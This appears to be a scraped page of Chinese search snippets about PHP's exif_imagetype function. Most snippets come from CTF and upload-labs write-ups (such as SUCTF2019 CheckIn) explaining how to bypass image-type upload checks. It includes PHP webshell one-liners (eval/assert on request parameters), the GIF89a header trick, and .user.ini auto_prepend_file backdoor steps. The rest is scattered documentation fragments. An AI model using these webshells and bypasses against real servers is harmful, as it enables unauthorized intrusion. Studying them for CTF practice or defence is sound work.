,换一种写法，需要加上GIF89a，进行exif_imagetype绕过上传成功这里用.user.ini或者用post传参system('cat/flag').user.ini内容为GIF89aauto_prepend_file

非法后缀将shell.php改为shell.jpg继续上传木马文件@eval($_REQUEST['shell']);继续上传exif_imagetype:notimage!Exif_imaget

解题思路一.打开题目：发现一个上传框，猜测上传一句话木马，获取后台shell二.上传.php.phtml.等有关的PHP文件，都显示非法后缀三.上传.htaccess文件，显示只能是图片类型文件exif_imagetype

exif_imagetype—判断一个图像的类型返回的是int类型。比

中的三种图片马都试了一下，都是可以上传成功并用蚁剑连接成功的，所以具体步骤这边就不写了，可以参照Pass-14（upload-labs通关（Pass-11~Pass-15）_箭雨镜屋-CSDN博客）代码分析：本关用exif_imagetype

很明显，是php安装时没有打开某些扩展，以致不能执行exif_imagetype()这个方法，因此需要打开。

在PHP获取图片类型可以使用PHP内置函数中的exif_imagetype预定义常量定义有以下常量，并代表了exif_imagetype()可能的返回值：图像类型常量值常量1IMAGETYPE_GIF2IMAGETYPE_JPEG3IMAGETYPE_PNG4IMAGETYPE_SWF5IMAGETYPE_PSD6IMAGETYPE_BMP7IMAGETYPE_TIFF_II

一、漏洞描述在upload-labs第十六关，服务器exit_imagetype()函数检测上传图片类型是否为白名单图片格式来验证上传文件合法性。可以通过制作图片马绕过，再配合文件包含漏洞解析文件来获取服务器配置信息。二、漏洞发现先在本地写php脚本若上传成功，且知道上传后文件在网站保存的路径，可通过网页访问获得服务器配置信息，命名为z.php。但是在这里不能用php文件直接上传，需要制作图片马来

中常见的上传验证黑名单常见自定义过滤规则白名单常见的过滤规则5、逻辑数组绕过5.1、图片一句话木马的制作与利用5.2、文件头检查5.3、getimagesize()图像信息判断5.4、竞争条件攻击5.5、突破exif_imagetype

Upload-Labs关卡0x00Pass16（exif_imagetype函数绕过）环境准备exif_imagetype函数0x01Pass17（二次渲染绕过）move_uploaded_file函数

根据exif_imagetype函数，首先要上传**.user.ini**文件文件内容为：GIF89aauto_prepend_file=01.jpg一句话木马如下：GIF89aeval($_POST[

文章目录一、[极客大挑战2019]UploadⅠ、.phtmlⅡ、解题二、[SUCTF2019]CheckInⅠ、exif_imagetype()绕过Ⅱ、.user.iniⅢ、解题完一、[极客大挑战2019

题目首先，查看源码分析，该代码通过exif_imagetype判断文件类型通过图片马进行上传绕过制作图片马接着用bp上传文件新建简单的包含文件漏洞的页面测试文件绕过成功！

0×00题目概述0×01源代码functionisImage($filename){//需要开启php_exif模块$image_type=exif_imagetype($filename);switch

然后尝试将内容删除，发现exif_imagetype:notimage!

然后上传txt格式的文件，发现后台好像是通过exif_imagetype函数判断的—判断一个图像的类型。if(!

目录前言pass-11（get00截断）pass-12（post00截断）pass-13（图片马unpack）pass-14（getimagesize图片马）pass-15（exif_imagetype

($t2-$t1);/*//exif_imagetype();可能返回的值:值常量1IMAGETYPE_GIF2IMAGETYPE_JPEG3IMAGETYPE_PNG4IMAGETYPE_SWF5IMAGETYPE_PSD6IMAGETYPE_BMP7IMAGETYPE_TIFF_II

CheckIn一道文件上传的题目，首先尝试上传最简单的一句话木马shell.php后缀被检测，尝试上传一个txt文件在php手册中查找一下exif_imagetype函数也就是说他会检测我们上传文件的签名

修改后再次上传发现显示exif_imagetype:notimage!，还用了exif_imagetype()进行检验，可以加上GIF89a进行绕过。但是后缀正则过滤了php字符，想直接绕过是没戏了。

，试了一下.php3，.php5，.phtml等都不行把文件后缀名改成.jpg试一下，检测到了内容assert($_REQUEST['cmd'])检测到文件不是图像，很明显是用exif_imagetype

文件上传黑名单过滤调用了php的exif_imagetype()函数利用文件头GIF89a绕过即可过滤了文本内容绕过即可修改MIME和利用特殊扩展名均失败正确姿势：利用.user.ini.user.ini

文件上传文件上传一般验证方式：1.本地js验证(客户端)2.MIME验证(服务端)3.拓展名验证(服务端)4.脚本内容（文件头）验证(服务端)通常会用到exif_imagetype()函数，这个函数会读取图片头并返回一个数组绕过方法

配置项auto_prepend_file会让php文件在执行前先包含一个指定的文件，通过这个配置项，我们就可以来隐藏自己的后门步骤1.新建文件.user.ini,写入GIF89a//绕过exif_imagetype

本文实例讲述了ThinkPHP做文字水印时提示callanundefinedfunctionexif_imagetype()解决方法。分享给大家供大家参考。具体如下：一、问题描述：ThinkPHP做文字水印，今天做一个电子请帖，就把祝福语贴到图片上面，发现一直报错是取不到图片类型，比如gif，jpg等，并提示callanundefinedfunctionexif_imagetype()。二、解决方

目录刷题记录：[SUCTF2019]CheckIn一、涉及知识点1、利用.user.ini上传\隐藏后门2、绕过exif_imagetype()的奇技淫巧二、解题方法刷题记录：[SUCTF2019]CheckIn

文件上传绕过总结前言参考客户端JS验证服务端校验检查后缀黑名单Windowsserver特性黑名单不全双写绕过白名单content-type字段校验:解析漏洞导致的上传内容检查文件头检查getimagesize()的绕过exif_imagetype

一、下载附件地址：链接:https://pan.baidu.com/s/1nuQ4NgP密码:4pbu二、将附件中的CropAvatar.php放到自己程序目录extend/org目录下,如果遇到exif_imagetype

使用用户自定义的比较函数对数组中的值进行排序rawurlencode:按照RFC1738对url进行编码parse_url:解析url,并返回其组成部分http_build_query：生成URl-encode之后的请求字符串exif_imagetype

*exif_imagetype -- 判断一个图像的类型 *说明：函数功能是把一个图像裁剪为任意大小的图像，图像不变形 * 参数说明：输入 需要处理图片的 文件名，生成新图片的保存文件名，生成新图片的宽

一般我们都是按照文件扩展名来判断文件类型，但是这个很不靠谱，轻易就通过修改扩展名来躲避了，一般必须要读取文件信息来识别，PHP扩展中提供了类似 exif_imagetype 这样的函数读取图片类的文件类型

exif_imagetype    判断一个图像的类型 exif_read_data    从 JPEG 或 TIFF 文件中读取 EXIF 头信息

(PHP4>=4.3.0,PHP5,PHP7)exif_imagetype—判断一个图像的类型图像类型常量值常量1IMAGETYPE_GIF2IMAGETYPE_JPEG3IMAGETYPE_PNG4IMAGETYPE_SWF5IMAGETYPE_PSD6IMAGETYPE_BMP7IMAGETYPE_TIFF_II

1.如果发现exif_imagetype调用导致fatalerror那么检查exif扩展有没有安装，扩展的动态安装方法是使用phpize（phpinstallzendextension）cd/root/

一般我们都是按照文件扩展名来判断文件类型，但是这个很不靠谱，轻易就通过修改扩展名来躲避了，一般必须要读取文件信息来识别，PHP扩展中提供了类似exif_imagetype这样的函数读取图片类的文件类型，

一般我们都是按照文件扩展名来判断文件类型，但是这个很不靠谱，轻易就通过修改扩展名来躲避了，一般必须要读取文件信息来识别，PHP扩展中提供了类似exif_imagetype这样的函数读取图片类的文件类型，

-Getfileextensionforimagetype image_type_to_mime_type--取得getimagesize，exif_read_data，exif_thumbnail，exif_imagetype